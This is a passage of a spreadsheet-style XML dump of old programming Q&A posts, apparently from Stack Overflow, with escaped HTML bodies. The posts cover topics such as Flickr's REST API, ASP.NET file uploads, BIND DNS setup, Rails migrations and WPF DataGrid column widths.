&lt;p&gt;To return the response in REST format, send a parameter "format" in the request with a value of "rest". When using the REST request method, the response defaults to REST.&lt;/p&gt;
&lt;p&gt;A method call returns this:&lt;/p&gt;
&lt;p&gt;
    [xml-payload-here]
&lt;/p&gt;
&lt;p&gt;If an error occurs, the following is returned:&lt;/p&gt;
&lt;p&gt;
&lt;/p&gt;
&lt;p&gt;I got that from here &lt;a href="http://www.flickr.com/services/api/request.rest.html" rel="nofollow"&gt;http://www.flickr.com/services/api/request.rest.html&lt;/a&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;This is the method I'm interested in &lt;a href="http://www.flickr.com/services/api/flickr.test.echo.html" rel="nofollow"&gt;http://www.flickr.com/services/api/flickr.test.echo.html&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;please help.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image Uploading in ASP.NET with C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created 2 pages: page1.aspx and page2.aspx. I defined 5 fileuploader controls in page 2 but I want to save Page1.aspx on save button.&lt;/p&gt;
&lt;p&gt;Actually, the page contains a Back Button in which I store all Uploading file in a string object and it populate on Page1.aspx as a session.&lt;/p&gt;
&lt;p&gt;How can I save a file on server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SQL Delete (Suspended in activity monitor)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a table containing hundreds of entries and I am trying to delete a small range. It is taking a long time, in fact it is not being executed.&lt;/p&gt;
&lt;p&gt;I monitored the query from the activity monitor and its status is "Suspended"&lt;/p&gt;
&lt;p&gt;Is there anyone knows what may cause this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ORM and SOA in the .NET world</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;From my experience the major ORM frameworks for .NET (&lt;a href="http://nhforge.org" rel="nofollow"&gt;NHibernate&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/bb425822.aspx" rel="nofollow"&gt;LinqToSql&lt;/a&gt;, &lt;a href="http://msdn.microsoft.com/en-us/library/aa697427%28VS.80%29.aspx" rel="nofollow"&gt;Entity Framework&lt;/a&gt;) work best when they keep track of loaded objects. This works fine for simple client-server applications, but when using three- or more tier architecture with Web Services in a Service Oriented Archtitecture, this is not possible. Eventually, by writing a lot of code to do the tracking yourself it could be done, but isn't ORM supposed to simplify DB access? &lt;/p&gt;
&lt;p&gt;Is the idea to use ORM in service oriented architecture good at all? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>IE prompts for password when saving an excel file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;File is sent to the client using Response.writefile and content diposition as inline. When user chooses to Save As, they are asked to authenticate with IIS again even though Anonymous access in enabled&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Testing tools for Django Project</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Can anyone please suggest some good testing tools for a Django project? &lt;/p&gt;
&lt;p&gt;I need to test the different use case scenarios, unit-testing, as well as load-testing for my project. Are there any good standard testing suites available?&lt;br&gt;
Any other suggestion(s) for the testing process is greatly appreciated.&lt;/p&gt;
&lt;p&gt;I use Django, postgresql on Ubuntu server if this information is necessary.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>NHibernate.Search with Lucene.NET without using DB?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could I use NHibernate.Search only with luceneâ€™s index without database? Because I would like to store all data only in my luceneâ€™s index, but I really like features in NHibernate.Search.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Best way to work with an array of pointers in Objective-C?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to mimic the following Java code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int[][] multi; // DIMENSIONS ARE UNKNOWN AT CREATION TIME
// LATER ON...
multi = new int[10][];
multi[5] = new int[20];
multi[5][11] = 66;
// LATER ON...
multi = null; // PROPER WAY OF FREEING EVERYTHING
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I've came out with the following Objective-C version:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int* *multi;
//
multi = malloc(10 * sizeof(int*));
multi[5] = (int *) malloc(20 * sizeof(int));
multi[5][11] = 66;
//
free(multi[5]);
free(multi);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So first, I'd like to hear if it's the best way to go. And mostly: I can't find a way to free memory in some "automatic" fashion, i.e. the following code is causing run-time exceptions on the IPhone:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;for (int i = 0; i &amp;lt; 10; i++)
{
    if (multi[i] != NULL) free(multi[i]);
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Excel VBA: Is there any way to format chart axes through VBA only?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to make column charts in Excel using VBA only (no user input). I wanted to format the labels of the x-axis so that the alignment for every label becomes -270 degrees. (This can be done manually by changing the "Custom angle" property in the "Alignment" tab of the "Format Axis" Dialog.) I have tried recording a macro for this but Excel does not seem to be recording the alignment step. Does anybody know how to do this with VBA only?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Registering object _instances_ instead of _types_ with .NET remoting?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There's something I'm just not getting about .NET remoting. Well, two things actually:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Why is the emphasis back on classes that inherit from MarshalByRef instead of interfaces ala the original COM style (which I liked)?&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Why is it that .NET remoting always forces you to effectively create some sort of object pool instead of allowing you to associate specific &lt;em&gt;instances&lt;/em&gt; with a URL?&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Server code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RemotingConfiguration.RegisterWellKnownServiceType(typeof(RemotingTypes.Server), "MyURL", WellKnownObjectMode.Singleton);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Client code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RemotingConfiguration.RegisterWellKnownServiceType(typeof(RemotingTypes.Server), "MyURL", WellKnownObjectMode.Singleton);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But suppose I want to create the "Server" instance myself and then just bind it to an endpoint?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;RemotingTypes.Server myInstance = new RemotingTypes.Server();
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What now? How can I associate "myInstance" with the URL "MyURL" ?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Start program on usb hardware plugin</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to detect when a specific device is plugged into a usb port, what I would like to happen is when I plug my laptop into my docking station it run up several apps to account for my different keyboard, mouse and monitors. Specifically I have an issue with some software for my G15 keyboard stopping media player closing properly.&lt;/p&gt;
&lt;p&gt;Hopefully in .NET but if not any suggestions appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Excel VBA: Which OLE/OCX control to use to display a chart in a form?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to display a column chart in a user form in VBA. Exporting the chart to GIF and importing in a picture box works; but I cannot use it because the chart needs to be modified based on options chosen by the user from the same form. I have been searching and people have commented that default OLE/OCX controls provided by MS may be used. I cannot find an ActiveX which may do the trick. Does somebody know which controls to use and how to use them?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Configuration of BIND DNS server, I'm lost</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I hope you'll forgive me for thinking that configuring a DNS server would be easy. It turns out it is quite hard... especially if you never did it before.&lt;/p&gt;
&lt;p&gt;To recap a little, I previously asked if someone could recommend a personal DNS server for Windows XP for use in a development project.&lt;/p&gt;
&lt;p&gt;My basic wish is to host a DNS server that represents the following lookup table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt; Address          | IP
------------------+--------------
 *.devdomain1.dev | 192.168.10.2
 *.devdomain2.dev | 192.168.10.2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Do you know how to setup this in BIND 9? Or maybe there is an easier solution that I've overlooked. I know I could add the individual subdomains in my HOSTS file but since we have a lot of subdomains which has to be maintained on several dev machines I would rather have a simple wildcard setup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Sharepoint: Is there some OOB way to delete provision files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm using OOB functionality to upload files to sharepoint. I'm using &lt;code&gt;&amp;lt;module&lt;/code&gt;&gt; tags and feature which wraps all data. (it is described &lt;a href="http://msdn.microsoft.com/en-us/library/ms441170.aspx" rel="nofollow"&gt;here&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;Here is example of module in my elements.xml file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;Module Name="SampleImages" Url="Style Library/Images/SampleImages" Path="Images" RootWebOnly="TRUE"&amp;gt;
	&amp;lt;File IgnoreIfAlreadyExists="TRUE" Name="example.jpg" Url ="example.jpg" Type="GhostableInLibrary" /&amp;gt;
&amp;lt;/Module&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The only problem is that when I deactivate feature uploaded files are not removed. Currently I use feature receiver which removes theese files, since I wasn't able to find any other solution.&lt;/p&gt;
&lt;p&gt;So do I miss something or this is the only way how I can get rid of files uploaded in this manner?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C#: How to remove namespace information from XML elements</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How can I remove the "xmlns:..." namespace information from each XML element in C#?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do i auto-populate fields in django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a model Question with a field called &lt;strong&gt;userid&lt;/strong&gt;, before one ask a question, one needs to login, i want when saving to capture the user ID of the currently logged-in user and assign it to the userid of the Question model.&lt;/p&gt;
&lt;p&gt;Please note am not showing the userid on my form i.e. in the Question model i have declared the userid as follows;&lt;/p&gt;
&lt;p&gt;class Question(models.Model):
    ...
   userid=models.ForeignKey(User, editable=false)
   ...&lt;/p&gt;
&lt;p&gt;How do i assign logged-in user ID to the Question model &lt;strong&gt;userid&lt;/strong&gt;?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Which is the maximum number of Windows concurrent tcp/ip connections?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In .NET I have already tried the configuration below successfully:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;  &amp;lt;system.net&amp;gt;
    &amp;lt;connectionManagement&amp;gt;
      &amp;lt;add address="*" maxconnection="100"/&amp;gt;
    &amp;lt;/connectionManagement&amp;gt;
  &amp;lt;/system.net&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Using 100 concurrent HttpWebRequest they answered almost simultaneously (less than a second).&lt;/p&gt;
&lt;p&gt;I wonder why some people wrote in some forums that Windows XP and Windows Server 2008 limits this number to 15 or 20. They are right?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>When I run the rake:db migrate command I get an error "Uninitialized constant CreateArticles"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I created a model ruby script/generate model Article (simple enuff)&lt;/p&gt;
&lt;p&gt;Here is the migration file create_articles.rb:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def self.up
  create_table :articles do |t|
    t.column :user_id, :integer
    t.column :title, :string
    t.column :synopsis, :text, :limit =&amp;gt; 1000
    t.column :body, :text, :limit =&amp;gt; 20000
    t.column :published, :boolean, :default =&amp;gt; false
    t.column :created_at, :datetime
    t.column :updated_at, :datetime
    t.column :published_at, :datetime
    t.column :category_id, :integer
  end
def self.down
  drop_table :articles
 end
end
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I run the rake:db migrate command I receive an error rake aborted! "Uninitialized constant CreateArticles."  &lt;/p&gt;
&lt;p&gt;Does anyone know why this error keeps happening? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>moodle file.php returns a blank 0 bytes file</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;For some reason one installation of Moodle 1.9.3+  has a problem that file.php returns a blank 0 byte file sometimes, even the apache log shows 0 bytes were returned.   Another moodle installation works OK with the same htm files.&lt;/p&gt;
&lt;p&gt;What could be causing this? Problematic files are just usual htm files - bug occurs with links like this:&lt;/p&gt;
&lt;p&gt;&lt;a href="http://server/file.php/164/moddata/scorm/4/data/msg.htm" rel="nofollow"&gt;http://server/file.php/164/moddata/scorm/4/data/msg.htm&lt;/a&gt; &lt;/p&gt;
&lt;p&gt;(The problematic moodle was upgraded from 1.8 version earlier)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio web user control events only show up in design mode?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Calling all Visual Studio gurus â€” when I'm working on a .ascx or .aspx file in a c# web project, the &lt;strong&gt;events&lt;/strong&gt; do not show up in the properties panel unless I switch into the design view from the code view. Is this an intentional functionality of Visual Studio? Both VS2005 and VS2008 seem to work this way.&lt;/p&gt;
&lt;p&gt;And is there any way to get the events to show up in the properties panel all the time?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Fastest way to "jump back" to a file in TextMate?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Often, when I am reading code or debugging, I want the ability to quickly jump around files.  I especially want to "go back" to where I was.  I know about "Command+T", "Command+Shift+T",  and, bookmarks.  But, I cannot figure out a way to jump around files quickly.&lt;/p&gt;
&lt;p&gt;UPDATE:  I do not think I my question was clear enough judging by two answers given.  Specifically, I am looking for a way to "jump back" to where I was in a file.  I know how to navigate in TextMate (in general).  I want to know if TextMate has a "jump back" key binding.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the point of www in web urls?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been trying to collect analytics for my website and realized that Google analytics was not setup to capture data for visitors to www.example.com (it was only setup for example.com). I noticed that many sites will redirect me to www.example.com when I type only example.com. However, stackoverflow does exactly the opposite (redirects www.stackoverflow.com to just stackoverflow.com).&lt;/p&gt;
&lt;p&gt;So, I've decided that in order to get accurate analytics, I should have my web server redirect all users to either www.example.com, or example.com. Is there a reason to do one or the other? Is it purely personal preference? What's the deal with www? I never type it in when I type domains in my browser.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the right way to initialize a non-empty static collection in C# 2.0?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to initialize a static collection within my C# class - something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Foo {
  private static readonly ICollection&amp;lt;string&amp;gt; g_collection = ???
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm not sure of the right way to do this; in Java I might do something like:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;private static final Collection&amp;lt;String&amp;gt; g_collection = Arrays.asList("A", "B");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is there a similar construct in C# 2.0? &lt;/p&gt;
&lt;p&gt;I know in later versions of C#/.NET you can do collection initializers (&lt;a href="http://msdn.microsoft.com/en-us/library/bb384062.aspx"&gt;http://msdn.microsoft.com/en-us/library/bb384062.aspx&lt;/a&gt;), but migration isn't an option for our system at the moment.&lt;/p&gt;
&lt;p&gt;To clarify my original question - I'm looking for a way to succinctly declare a simple static collection, such as a simple constant collection of strings. The static-initializer-style way is also really good to know for collections of more complex objects.&lt;/p&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Optimising if statements by reordering</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I remember reading once that the order of the members of an evaluation is important.
Such as&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (null == myClass)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is better (faster?) then&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;if (myClass == null)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;is this the case?
If so could someone explain how and why?
If the answer requires a language then aim towards c#.&lt;br/&gt;
Thanks&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio on a Mac</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My job is currently based on Visual Studio (ASP.NET).&lt;br/&gt;
Looking for experiences using Visual Studio on a Mac.&lt;br/&gt;
Does it work?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to programmatically select an item in a WPF TreeView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How is it possible to programmatically select an item in a WPF &lt;code&gt;TreeView&lt;/code&gt;?  The &lt;code&gt;ItemsControl&lt;/code&gt; model seems to prevent it.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ribbon UI Control for WinForms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a Ribbon UI Control available in VS 2008? Will it be available if i have office 2007 installed on the development and deployment machines?&lt;/p&gt;
&lt;p&gt;&lt;br /&gt; 
EDIT: I would imagine that Microsoft would include the Ribbon UI control in VS 2008 as this is the way the UI of office is going to be moving forward also for the sake of consistency in Windows applications&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to compose `not` with a function of arbitrary arity?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I have some function of type like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;f :: (Ord a) =&amp;gt; a -&amp;gt; a -&amp;gt; Bool
f a b = a &amp;gt; b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I should like make function which wrap this function with not.&lt;/p&gt;
&lt;p&gt;e.g. make function like this&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;g :: (Ord a) =&amp;gt; a -&amp;gt; a -&amp;gt; Bool
g a b = not $ f a b
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can make combinator like&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;n f = (\a -&amp;gt; \b -&amp;gt; not $ f a b)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I don't know how.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;*Main&amp;gt; let n f = (\a -&amp;gt; \b -&amp;gt; not $ f a b)
n :: (t -&amp;gt; t1 -&amp;gt; Bool) -&amp;gt; t -&amp;gt; t1 -&amp;gt; Bool
Main&amp;gt; :t n f
n f :: (Ord t) =&amp;gt; t -&amp;gt; t -&amp;gt; Bool
*Main&amp;gt; let g = n f
g :: () -&amp;gt; () -&amp;gt; Bool
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
&lt;p&gt;And bonus question how I can do this for function with more and lest parameters e.g.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;t -&amp;gt; Bool
t -&amp;gt; t1 -&amp;gt; Bool
t -&amp;gt; t1 -&amp;gt; t2 -&amp;gt; Bool
t -&amp;gt; t1 -&amp;gt; t2 -&amp;gt; t3 -&amp;gt; Bool
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>How can I prevent/detect an underflow in a Postgresql calculation that uses EXP()</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am receiving a value out of range: underflow error from pgsql, in a query that uses the EXP(x) function.  What values of x trigger this?  How do I prevent or detect it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there a good Java networking library?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently searching for a Java networking library. What I want to do is sending XML, JSON or other serialized messages from a client to another client and/or client to server.&lt;/p&gt;
&lt;p&gt;My first attempt was to create an POJO for each message, plus a MessageWriter for sending and a MessageReader for receiving it. Plus socket and error handling. Which is quite a lot of error prone work.&lt;/p&gt;
&lt;p&gt;What I'm looking for is a a higher level library which abstracts from sockets. Furthermore it should supports something like code generation for the messages.&lt;/p&gt;
&lt;p&gt;Google's Protocol Buffers (&lt;a href="http://code.google.com/apis/protocolbuffers/"&gt;http://code.google.com/apis/protocolbuffers/&lt;/a&gt;) looks promising. But are there alternatives? The emphasis is not on speed or security (at the moment), it is just supposed to work reliable and with a low amount of implementation time.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How should I import highly formatted data from Excel to a database?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best way to import highly formatted data from Excel to SQL server.
Basically I have 250+ Excel files that have been exported from a reporting tool in a format that our business users would prefer. This is a 3rd party tool that can not export data in any other format.  I need to "scrub" these files on a monthly basis and import them into a database. I want to use SQL Server 2005&lt;/p&gt;
&lt;p&gt;File formats look like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;                                                         Report Name
                                                     Report Description
                                    MTH/DEC/2003 MTH/JAN/2004 MTH/FEB/2004 
                                    Data Type  Data Type    Data Type
Grouping 1                           1900         1700         2800
  Grouping 2                         1500         900          1300
    Detail                           300          500          1000
    Detail                           1100         200          200
    Detail                           100          200          100
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Able Commerce POS Data Merge</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are building an AbleCommerce 7 web store and trying to integrate it with an existing point-of-sale system.  The product inventory will be shared between a phyical store and a web store so we will need to periodically update quantity on hand for each product to keep the POS and the web store as close to in synch as possible to avoid over selling product in either location.  The POS system does have an scheduled export that will run every hour.&lt;/p&gt;
&lt;p&gt;My question is, has anyone had any experience with synchronizing data with an Able Commerce 7 web store and would you have any advice on an approach?&lt;/p&gt;
&lt;p&gt;Here are the approaches that we are currently considering:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Grab exported product data from the POS system and determine which products need to be updated.  Make calls to a custom-built web service residing on the server with AbleCommerce to call AbleCommerce APIs and update the web store appropriately.&lt;/li&gt;
&lt;li&gt;Able Commerce does have a Data Port utility that can import/export web store data via the Able Commerce XML format.  This would provide all of the merging logic but there doesn't appear to be a way to programmatically kick off the merge process.  Their utility is a compiled Windows application.  There is no command-line interface that we are aware of.  The Data Port utility calls an ASHX handler on the server.&lt;/li&gt;
&lt;li&gt;Take an approach similar to #1 above but attempt to use the Data Port ASHX handler to update the products instead of using our own custom web service.  Currently there is no documentation for interfacing with the ASHX handler that we are aware of.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Thanks,
Brian&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are Apache Ant Javadocs Included in the Eclipse Plugin?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was trying to add Ant libraries to a project in eclipse, and I used the ones that were part of eclipse's plugins folder. When I tried to associate them with Javadocs, I couldn't locate them in the plugin folder. I searched for them online, and I found &lt;a href="http://ant.apache.org/manual/api/index.html" rel="nofollow"&gt;this page&lt;/a&gt;, in which they say the docs are not provided online because they are part of every distribution. So where can I find the docs in the distribution that came bundled in Eclipse?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>exchange powershell : parsing an array boolean value</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In my output, I get&lt;/p&gt;
&lt;p&gt;@{ActiveSyncEnabled=False}&lt;/p&gt;
&lt;p&gt;how do I parse this so that it just says "False"?&lt;/p&gt;
&lt;p&gt;the output is coming from this line of code: &lt;/p&gt;
&lt;pre&gt;&lt;code&gt; $pda = get-casmailbox -Anr $user.displayname | select activesyncenabled
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>python "'NoneType' object has no attribute 'encode'"</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I wrote this tiny Python snippet that scrapes a feed and prints it out. When I run the code, something in the feed triggers the error message you see here as my question. Here's the complete console output on error:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt; Traceback (most recent call last):  
&amp;gt; File "/home/vijay/ffour/ffour5.py",
&amp;gt; line 20, in &amp;lt;module&amp;gt;
&amp;gt;     myfeed()   File "/home/vijay/ffour/ffour5.py", line
&amp;gt; 15, in myfeed
&amp;gt;     sys.stdout.write(entry["title"]).encode('utf-8')
&amp;gt; AttributeError: 'NoneType' object has
&amp;gt; no attribute 'encode'
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>LINQ sorting anonymous types?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;How do I do sorting when generating anonymous types in linq to sql?&lt;/p&gt;
&lt;p&gt;Ex:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;from e in linq0
order by User descending /* ??? */
select new
{
   Id = e.Id,
   CommentText = e.CommentText,
   UserId = e.UserId,
   User = (e.User.FirstName + " " + e.User.LastName).Trim()),
   Date = string.Format("{0:d}", e.Date)
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>WPF DataGrid Sync Column Widths</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've got two WPF Toolkit &lt;code&gt;DataGrids&lt;/code&gt;, I'd like so that when the user resizes the first column in the first grid, it resizes the first column in the second grid. I've tried binding the width of the &lt;code&gt;DataGridColumn&lt;/code&gt; in the second grid to the appropriate column in the first grid, but it doesn't work. I'd prefer to use all xaml, but I'm fine with using code behind as well.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;tk:DataGrid Width="100" Height="100"&amp;gt;
    &amp;lt;tk:DataGrid.Columns&amp;gt;
        &amp;lt;tk:DataGridTextColumn x:Name="Column1" Width="50"/&amp;gt;
    &amp;lt;/tk:DataGrid.Columns&amp;gt;
&amp;lt;/tk:DataGrid&amp;gt;
&amp;lt;tk:DataGrid Width="100" Height="100"&amp;gt;
    &amp;lt;tk:DataGrid.Columns&amp;gt;
        &amp;lt;tk:DataGridTextColumn x:Name="Column1Copy" Width="{Binding Path=ActualWidth, ElementName=Column1}"/&amp;gt;
    &amp;lt;/tk:DataGrid.Columns&amp;gt;
&amp;lt;/tk:DataGrid&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I also tried binding to &lt;code&gt;Width&lt;/code&gt; instead of &lt;code&gt;ActualWidth&lt;/code&gt;, but neither works.&lt;/p&gt;
&lt;p&gt;Any help is greatly appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Rails: Creating an HTML Snippet with a Variable?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a submit button that is a block of HTML code because of styling and images to make it look better. (I stole most of it from Wufoo).&lt;/p&gt;
&lt;p&gt;This is one every form in the application and I was wondering if there is a cleaner way to do this. Something like a partial or helper? &lt;/p&gt;
&lt;p&gt;The name of the button "Submit" or "Add Contact" needs to be a variable.&lt;/p&gt;
&lt;h1&gt;snippet&lt;/h1&gt;
         Add Contact  #variable text 
         Back
    &lt;br&gt;&lt;br&gt;* Required
</t>
  </si>
  <si>
    <t>How do you set up solution configuration specific config files?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web service that needs different settings for different environments (debug, test, prod). What's the easiest way to setup separate config files for these different environments? Everything I find on the web tells me how to use configuration manager to retrieve settings, but not how to find particular settings based on the current build configuration.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Javascript HAML editor</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know of a Javascript based &lt;a href="http://haml.hamptoncatlin.com/" rel="nofollow"&gt;HAML&lt;/a&gt; editor out there? I'm looking for for something like &lt;a href="http://tinymce.moxiecode.com/" rel="nofollow"&gt;TinyMCE&lt;/a&gt; that just understands HAML (so it does indenting and highlighting correctly)&lt;/p&gt;
&lt;p&gt;I'm thinking of using an editor like this for a dynamic website I'm building.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Clarification&lt;/strong&gt; 
The site I am building allows the users to define layouts(in the rails sense) and css. So finer grain control than textile and markdown is required, I know I can include raw html in markdown but haml is so much prettier.  &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to Test Standard HTML Forms</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What tools are best for lightweight testing of HTML forms? My particular use is &lt;strong&gt;very light:&lt;/strong&gt; no multithreading issues nor elaborate test scripts: just fill in a form with particular values and let &lt;strong&gt;me&lt;/strong&gt; click submit.&lt;/p&gt;
&lt;p&gt;A Firefox plugin would be fine...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why am I suddenly getting Missing Template errors with edge Rails (2.3)?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After freezing edge rails, all my controller examples are failing with
MissingTemplate errors.
e.g., "Missing template attachments/create.erb in view path app/views"&lt;/p&gt;
&lt;p&gt;Trying to actually render the views gives me the same error.&lt;/p&gt;
&lt;p&gt;I noticed I can fix most of them by using respond_to but I usually
never use it. I almost always only need to respond to one format in
one action so I omit respond_to and let Rails figure out which file to
render.&lt;/p&gt;
&lt;p&gt;Does Rails suddenly require respond_to blocks in every action as of 2.3?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Change Tracking Structure</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We are looking to implement Optimistic locking in our WCF/WPF application. So far the best way I've come up with doing this is to implement a generic Optimistic which will store a copy of the original and any changes (so it will store two copies: the original and modified) of any value object that can be modified. Is this the best way of doing it?&lt;/p&gt;
&lt;p&gt;For example: a UserVO will be wrapped by the generic as a Optimistic. When a change is made to the Optimistic, the change will be made to the modified copy stored in the Optimistic while the original also stored in the Optimistic will remain intact. The main issue seems to be that it will use up twice the space and hence bandwidth.&lt;/p&gt;
&lt;p&gt;Thanks&lt;/p&gt;
